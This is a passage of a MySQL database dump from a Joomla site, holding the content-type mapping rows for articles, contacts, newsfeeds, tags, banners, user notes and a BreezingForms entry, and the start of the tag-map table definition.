-- Dumping data for table `atlyh_content_types`
--
LOCK TABLES `atlyh_content_types` WRITE;
/*!40000 ALTER TABLE `atlyh_content_types` DISABLE KEYS */;
INSERT INTO `atlyh_content_types` VALUES (1,'Article','com_content.article','{\"special\":{\"dbtable\":\"#__content\",\"key\":\"id\",\"type\":\"Content\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"introtext\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"attribs\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"asset_id\"}, \"special\":{\"fulltext\":\"fulltext\"}}','ContentHelperRoute::getArticleRoute','{\"formFile\":\"administrator\\/components\\/com_content\\/models\\/forms\\/article.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(2,'Weblink','com_weblinks.weblink','{\"special\":{\"dbtable\":\"#__weblinks\",\"key\":\"id\",\"type\":\"Weblink\",\"prefix\":\"WeblinksTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{}}','WeblinksHelperRoute::getWeblinkRoute','{\"formFile\":\"administrator\\/components\\/com_weblinks\\/models\\/forms\\/weblink.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"featured\",\"images\"], \"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(3,'Contact','com_contact.contact','{\"special\":{\"dbtable\":\"#__contact_details\",\"key\":\"id\",\"type\":\"Contact\",\"prefix\":\"ContactTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"address\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"image\", \"core_urls\":\"webpage\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{\"con_position\":\"con_position\",\"suburb\":\"suburb\",\"state\":\"state\",\"country\":\"country\",\"postcode\":\"postcode\",\"telephone\":\"telephone\",\"fax\":\"fax\",\"misc\":\"misc\",\"email_to\":\"email_to\",\"default_con\":\"default_con\",\"user_id\":\"user_id\",\"mobile\":\"mobile\",\"sortname1\":\"sortname1\",\"sortname2\":\"sortname2\",\"sortname3\":\"sortname3\"}}','ContactHelperRoute::getContactRoute','{\"formFile\":\"administrator\\/components\\/com_contact\\/models\\/forms\\/contact.xml\",\"hideFields\":[\"default_con\",\"checked_out\",\"checked_out_time\",\"version\",\"xreference\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[ {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ] }'),(4,'Newsfeed','com_newsfeeds.newsfeed','{\"special\":{\"dbtable\":\"#__newsfeeds\",\"key\":\"id\",\"type\":\"Newsfeed\",\"prefix\":\"NewsfeedsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{\"numarticles\":\"numarticles\",\"cache_time\":\"cache_time\",\"rtl\":\"rtl\"}}','NewsfeedsHelperRoute::getNewsfeedRoute','{\"formFile\":\"administrator\\/components\\/com_newsfeeds\\/models\\/forms\\/newsfeed.xml\",\"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(5,'User','com_users.user','{\"special\":{\"dbtable\":\"#__users\",\"key\":\"id\",\"type\":\"User\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"null\",\"core_alias\":\"username\",\"core_created_time\":\"registerdate\",\"core_modified_time\":\"lastvisitDate\",\"core_body\":\"null\", \"core_hits\":\"null\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"access\":\"null\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"null\", \"core_language\":\"null\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"null\", \"core_ordering\":\"null\", \"core_metakey\":\"null\", \"core_metadesc\":\"null\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{}}','UsersHelperRoute::getUserRoute',''),(6,'Article Category','com_content.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContentHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(7,'Contact Category','com_contact.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContactHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(8,'Newsfeeds Category','com_newsfeeds.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','NewsfeedsHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(9,'Weblinks Category','com_weblinks.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','WeblinksHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10,'Tag','com_tags.tag','{\"special\":{\"dbtable\":\"#__tags\",\"key\":\"tag_id\",\"type\":\"Tag\",\"prefix\":\"TagsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\"}}','TagsHelperRoute::getTagRoute','{\"formFile\":\"administrator\\/components\\/com_tags\\/models\\/forms\\/tag.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"lft\", \"rgt\", \"level\", \"path\", \"urls\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(11,'Banner','com_banners.banner','{\"special\":{\"dbtable\":\"#__banners\",\"key\":\"id\",\"type\":\"Banner\",\"prefix\":\"BannersTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"null\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"imptotal\":\"imptotal\", \"impmade\":\"impmade\", \"clicks\":\"clicks\", \"clickurl\":\"clickurl\", \"custombannercode\":\"custombannercode\", \"cid\":\"cid\", \"purchase_type\":\"purchase_type\", \"track_impressions\":\"track_impressions\", \"track_clicks\":\"track_clicks\"}}','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/banner.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"reset\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"imptotal\", \"impmade\", \"reset\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"cid\",\"targetTable\":\"#__banner_clients\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(12,'Banners Category','com_banners.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(13,'Banner Client','com_banners.client','{\"special\":{\"dbtable\":\"#__banner_clients\",\"key\":\"id\",\"type\":\"Client\",\"prefix\":\"BannersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/client.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\"], \"ignoreChanges\":[\"checked_out\", \"checked_out_time\"], \"convertToInt\":[], \"displayLookup\":[]}'),(14,'User Notes','com_users.note','{\"special\":{\"dbtable\":\"#__user_notes\",\"key\":\"id\",\"type\":\"Note\",\"prefix\":\"UsersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_users\\/models\\/forms\\/note.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\"], \"convertToInt\":[\"publish_up\", \"publish_down\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(15,'User Notes Category','com_users.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(16,'BreezingForms','com_breezingforms.form','','','','BreezingformsHelperRoute::getFormRoute',NULL);
/*!40000 ALTER TABLE `atlyh_content_types` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_contentitem_tag_map`
--
DROP TABLE IF EXISTS `atlyh_contentitem_tag_map`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_contentitem_tag_map` (
`type_alias` varchar(255) NOT NULL DEFAULT '',
`core_content_id` int(10) unsigned NOT NULL COMMENT 'PK from the core content table',
`content_item_id` int(11) NOT NULL COMMENT 'PK from the content type table',
`tag_id` int(10) unsigned NOT NULL COMMENT 'PK from the tag table',
`tag_date` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Date of most recent save for this tag-item',
`type_id` mediumint(8) NOT NULL COMMENT 'PK from the content_type table',
